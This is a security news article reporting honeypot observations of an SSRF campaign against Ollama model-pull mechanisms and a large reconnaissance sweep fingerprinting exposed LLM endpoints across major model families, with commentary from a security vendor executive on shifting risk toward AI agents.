Attackers Are Quietly Mapping the AI Stack—and the Reconnaissance Phase Is Nearly Over

Jan 12
4 min read

For years, defenders have warned that artificial intelligence would expand the attack surface. What they lacked was proof that adversaries were already doing the math.

That proof is now emerging from telemetry captured deep inside live AI infrastructure.

Between October 2025 and January 2026, researchers operating an Ollama-based honeypot observed more than 91,000 attack sessions, revealing two distinct campaigns that illuminate how threat actors are methodically charting the rapidly growing ecosystem of large language model deployments. One campaign focused on coercing servers into making outbound connections. The other was something more unsettling: a systematic census of exposed LLM endpoints across nearly every major commercial model family.

Together, the activity suggests that attackers are no longer experimenting with AI systems. They are cataloging them.

Forcing Servers to Phone Home

The first campaign revolved around classic server-side request forgery (SSRF), updated for the AI era.

Attackers targeted Ollama’s model-pull mechanism, injecting malicious registry URLs designed to force servers into making outbound HTTP requests to attacker-controlled infrastructure. In parallel, the same infrastructure was observed abusing Twilio SMS webhook integrations by manipulating MediaUrl parameters—an overlap that suggests shared tooling and operational coordination rather than coincidence.

What made the campaign stand out was not its sophistication, but its scale and precision. Nearly all traffic shared a single JA4H fingerprint, strongly indicating automated scanning powered by tools like Nuclei. The infrastructure spanned dozens of countries, yet the consistency of the signatures revealed centralized VPS-based operations rather than a distributed botnet.

A sharp spike over the Christmas holiday—nearly 1,700 sessions in just 48 hours—hinted at operators unconstrained by corporate calendars.

While the use of ProjectDiscovery’s out-of-band testing infrastructure aligns with common bug-bounty techniques, the volume and timing blur the line between research and grey-hat exploitation. Even if the intent was discovery, the result was confirmation: AI-adjacent services are responding in predictable, testable ways to SSRF pressure.

The Enumeration Campaign That Changes the Risk Equation

If the SSRF activity raised eyebrows, the second campaign should raise alarms.

Beginning on December 28, two IP addresses launched a methodical sweep of more than 70 distinct LLM endpoints, generating over 80,000 sessions in eleven days. The objective was not exploitation—it was identification.

Requests were deliberately bland: “hi,” basic trivia questions, even empty prompts. These queries are unlikely to trigger alerts, yet they are highly effective at fingerprinting which model responds, how proxies are configured, and whether access controls are misapplied.

The probe list read like a who’s who of modern AI: OpenAI-compatible APIs, Google Gemini formats, Anthropic Claude variants, Meta’s Llama, DeepSeek, Mistral, Qwen, and Grok. The message was clear: no major model ecosystem was excluded.

Unlike the earlier SSRF campaign, this activity traced back to infrastructure already associated with large-scale CVE exploitation. Historical data ties the same IP space to hundreds of vulnerabilities and millions of scanning events, indicating a professional operation feeding reconnaissance data into a broader attack pipeline.

This was not curiosity. It was preparation.

From Models to Agents

Security teams have long treated models as the primary object of AI defense—guarding prompts, filtering outputs, hardening APIs. But the reconnaissance underway suggests attackers are thinking several steps ahead.

Chris Hughes, VP of Security Strategy at Zenity, sees the current wave of enumeration as an opening move rather than an end goal.

“While this marks the first public confirmation of attackers targeting AI systems, it certainly won’t be the last. The information gained from probing LLMs will be used in future malicious activity, making it critical for security teams to understand which AI systems and agents are in place, where they are exposed, and how to respond.

The GreyNoise findings show adversaries systematically enumerating LLM endpoints and testing for misconfigurations, which is classic reconnaissance behavior that precedes exploitation. Model security remains a necessary layer of defense. But the greater risk emerges when AI agents invoke tools, access enterprise systems, and execute actions across SaaS, cloud, and developer environments.

Most organizations lack basic visibility into which agents exist, how they are configured, what permissions they hold, or how they behave at runtime. Security teams need to expand their focus to govern agents by enforcing policy at build time and detecting anomalous behavior at the action level. As attackers move from probing models to exploiting agents, organizations that focus only on model-centric security will be responding to incidents they never saw coming.”

The implication is stark: enumerating models is merely how attackers build the map. Agents—connected, permissioned, and capable of action—are the terrain they intend to cross.

The New Reconnaissance Reality

Defenders are accustomed to seeing scans before exploits. What’s different now is the target.

AI infrastructure blends APIs, developer tools, cloud services, and autonomous workflows in ways traditional asset inventories fail to capture. An exposed endpoint isn’t just a data leak risk—it can be a gateway into decision-making systems that act on behalf of the enterprise.

The sheer volume of enumeration traffic observed—tens of thousands of requests across multiple model families—represents time, compute, and intent. Threat actors don’t invest at that scale unless they expect a return.

For organizations running public or semi-public LLM endpoints, the uncomfortable conclusion is unavoidable: reconnaissance is already happening, quietly and systematically. And in the attacker playbook, mapping always comes before exploitation.